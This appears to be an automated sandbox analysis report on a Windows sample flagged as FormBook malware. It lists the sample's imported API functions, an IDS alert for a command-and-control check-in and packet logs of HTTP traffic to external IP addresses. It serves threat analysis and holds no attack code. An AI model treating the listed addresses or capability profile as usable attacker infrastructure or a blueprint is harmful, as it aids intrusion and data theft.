RT_MANIFEST	0x121eb0	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T22:50:24.512052+0100	2856318	ETPRO MALWARE FormBook CnC Checkin (POST) M4	1	192.168.2.8	65520	165.154.96.210	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:49:00.668975115 CET	50634	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:49:00.673882008 CET	53	50634	1.1.1.1	192.168.2.8
Jan 10, 2025 22:49:00.674052954 CET	50634	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:49:00.678850889 CET	53	50634	1.1.1.1	192.168.2.8
Jan 10, 2025 22:49:01.155235052 CET	50634	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:49:01.160732985 CET	53	50634	1.1.1.1	192.168.2.8
Jan 10, 2025 22:49:01.161533117 CET	50634	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:49:02.184712887 CET	65498	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:49:02.189552069 CET	53	65498	1.1.1.1	192.168.2.8
Jan 10, 2025 22:49:02.189625978 CET	65498	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:49:02.194495916 CET	53	65498	1.1.1.1	192.168.2.8
Jan 10, 2025 22:49:02.637360096 CET	65498	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:49:02.642419100 CET	53	65498	1.1.1.1	192.168.2.8
Jan 10, 2025 22:49:02.642486095 CET	65498	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:49:20.375562906 CET	65503	80	192.168.2.8	172.67.186.192
Jan 10, 2025 22:49:20.380412102 CET	80	65503	172.67.186.192	192.168.2.8
Jan 10, 2025 22:49:20.380490065 CET	65503	80	192.168.2.8	172.67.186.192
Jan 10, 2025 22:49:20.391077042 CET	65503	80	192.168.2.8	172.67.186.192
Jan 10, 2025 22:49:20.395849943 CET	80	65503	172.67.186.192	192.168.2.8
Jan 10, 2025 22:49:21.092318058 CET	80	65503	172.67.186.192	192.168.2.8
Jan 10, 2025 22:49:21.092336893 CET	80	65503	172.67.186.192	192.168.2.8
Jan 10, 2025 22:49:21.092488050 CET	65503	80	192.168.2.8	172.67.186.192
Jan 10, 2025 22:49:21.093451977 CET	80	65503	172.67.186.192	192.168.2.8
Jan 10, 2025 22:49:21.093501091 CET	65503	80	192.168.2.8	172.67.186.192
Jan 10, 2025 22:49:21.095863104 CET	65503	80	192.168.2.8	172.67.186.192
Jan 10, 2025 22:49:21.100627899 CET	80	65503	172.67.186.192	192.168.2.8
Jan 10, 2025 22:49:36.179054976 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:36.185101032 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:36.187995911 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:36.211005926 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:36.217204094 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.113358021 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.113379002 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.113390923 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.113492012 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.113497972 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.113516092 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.113523006 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.113563061 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.113626957 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.113634109 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.113647938 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.113714933 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.113796949 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.118628979 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.118658066 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.118674040 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.118765116 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.217612982 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.217632055 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.217650890 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.217683077 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.217708111 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.217724085 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.217763901 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.217816114 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.218189001 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.218199015 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.218208075 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.218240976 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.218255043 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.218265057 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.218296051 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.219002008 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.219012976 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.219048023 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.219340086 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.219377995 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.219383955 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.219388008 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.219424009 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.219485044 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.219495058 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.219540119 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.220340014 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.220349073 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.220357895 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.220385075 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.220439911 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.220451117 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.220488071 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.222599030 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.222820997 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.309168100 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.309189081 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.309261084 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.334238052 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334279060 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334321976 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334341049 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334351063 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.334359884 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334378004 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334393978 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.334402084 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334404945 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.334446907 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334465981 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334489107 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334496975 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.334527969 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.334757090 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334772110 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334882975 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334883928 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.334903002 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334937096 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.334952116 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.334994078 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.335031986 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.335093021 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.335098982 CET	80	65504	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:37.335156918 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:37.725687027 CET	65504	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:38.743949890 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:38.748986959 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:38.749066114 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:38.771270037 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:38.776267052 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.585517883 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.585594893 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.585633039 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.585666895 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.585674047 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.585711956 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.585722923 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.585757017 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.585791111 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.585799932 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.585824013 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.585860968 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.585882902 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.585900068 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.585946083 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.590845108 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.590879917 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.590919018 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.590926886 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.645692110 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.690028906 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.690066099 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.690077066 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.690114975 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.690126896 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.690152884 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.690182924 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.690388918 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.690428972 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.690444946 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.690455914 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.690493107 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.690593958 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.690604925 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.690644026 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.691262960 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.691308975 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.691332102 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.691349030 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.691387892 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.691400051 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.691425085 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.692167044 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.692192078 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.692203045 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.692217112 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.692235947 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.692286015 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.692297935 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.692341089 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.693032026 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.693087101 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.693099022 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.693124056 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.739423037 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.776671886 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794154882 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794171095 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794240952 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.794296980 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794310093 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794317961 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794367075 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794378042 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794397116 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.794437885 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.794646978 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794658899 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794671059 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794703960 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.794764996 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794790983 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794810057 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.794812918 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.794857979 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:39.795382977 CET	80	65505	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:39.795433044 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:40.286473036 CET	65505	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:41.304961920 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:41.309844971 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:41.309943914 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:41.324131012 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:41.328984976 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:41.329099894 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.191343069 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.191363096 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.191371918 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.191404104 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.191438913 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.191461086 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.191468954 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.191476107 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.191502094 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.191529036 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.191559076 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.191564083 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.191584110 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.191622972 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.191657066 CET	65506	80	192.168.2.8	134.0.14.158
Jan 10, 2025 22:49:42.196305990 CET	80	65506	134.0.14.158	192.168.2.8
Jan 10, 2025 22:49:42.196324110 CET	80	65506	134.0.14.158	192.168.2.8
